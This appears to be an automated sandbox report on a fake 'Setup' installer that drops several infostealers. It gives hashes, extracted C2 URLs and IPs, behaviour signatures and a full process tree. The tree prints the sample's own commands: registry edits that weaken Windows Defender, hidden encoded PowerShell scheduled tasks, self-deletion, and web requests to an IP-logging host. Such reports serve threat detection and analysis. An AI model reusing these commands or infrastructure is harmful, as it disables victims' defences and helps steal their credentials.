Analysis
-
max time kernel
1825s -
max time network
1835s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
02-02-2022 13:26
General
-
Target
Setup_x32_x64.exe
-
Size
2.5MB
-
MD5
5f7f42f26f25e4e7342c00e05c0176fa
-
SHA1
582ea6aa20547c8b7f83ceccba5b3b4b1e7e4fb7
-
SHA256
9e719c4dd5e1086d5197fded7b8cdb0d3d592c0636b0d469fcda22c9723e8e7c
-
SHA512
887d80f3993cbd19114388aaa329ecfd7ff9eb7767b5fa1df88245155d9eca42d0756bd4297686666dcae49d9e9374dfc40d0cf86f71d444d572706ef036663c
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.kvubgc.com/
Extracted
Family
raccoon
Version
1.8.5
Botnet
97440559aa600fdf11b5d973d306af5470f07592
Attributes
-
url4cnc
http://188.166.1.115/capibar
http://91.219.236.139/capibar
http://194.180.174.147/capibar
http://185.3.95.153/capibar
http://185.163.204.22/capibar
https://t.me/capibar
rc4.plain
rc4.plain
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 19 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 12 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
OnlyLogger Payload 2 IoCs
-
Vidar Stealer 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 38 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 33 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 25 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
Checks processor information in registry 2 TTPs 36 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 31 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 19 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup_x32_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_x32_x64.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Uaqy72⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5937278540378143348,12863368217294888884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5937278540378143348,12863368217294888884,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:33⤵
-
C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Btnm72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff63e8f5460,0x7ff63e8f5470,0x7ff63e8f54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3816 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4796 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6180 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4820 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6200 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:83⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -u3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RobCleanerInstl3183813.exe"C:\Users\Admin\AppData\Local\Temp\RobCleanerInstl3183813.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\48b85f34-ba76-4a43-8811-51001d013e78.exe"C:\Users\Admin\AppData\Local\Temp\48b85f34-ba76-4a43-8811-51001d013e78.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe"C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 7604⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 12884⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 12964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 9084⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 13284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dhgUgg1lwzVFLeDAWWwO2YJd.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dhgUgg1lwzVFLeDAWWwO2YJd.exe" /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\Sm_lvl2URwt3bkdpYbN6ppsk.exe"C:\Users\Admin\Pictures\Adobe Films\Sm_lvl2URwt3bkdpYbN6ppsk.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 4524⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe"C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C del C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe4⤵
-
C:\Users\Admin\Pictures\Adobe Films\1BwX9cFBeToivHJC1osbHAsz.exe"C:\Users\Admin\Pictures\Adobe Films\1BwX9cFBeToivHJC1osbHAsz.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\VdcmpLWQ4sQClzr_v_nHf2ng.exe"C:\Users\Admin\Pictures\Adobe Films\VdcmpLWQ4sQClzr_v_nHf2ng.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\LzWgYoMzjeu0S_yZPBZpgsk3.exe"C:\Users\Admin\Pictures\Adobe Films\LzWgYoMzjeu0S_yZPBZpgsk3.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\8ZCfgm0NuWkp7PKQifskxkTL.exe"C:\Users\Admin\Pictures\Adobe Films\8ZCfgm0NuWkp7PKQifskxkTL.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE9B9.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS5237.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqEqIUWFh" /SC once /ST 13:41:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqEqIUWFh"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqEqIUWFh"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe\" j1 /site_id 525403 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\IvsskHJfubsqZ5nFS_xpOLRK.exe"C:\Users\Admin\Pictures\Adobe Films\IvsskHJfubsqZ5nFS_xpOLRK.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 4644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\beb9YTbvJFLvLXX592jpxOvD.exe"C:\Users\Admin\Pictures\Adobe Films\beb9YTbvJFLvLXX592jpxOvD.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "1.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1.exe"1.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
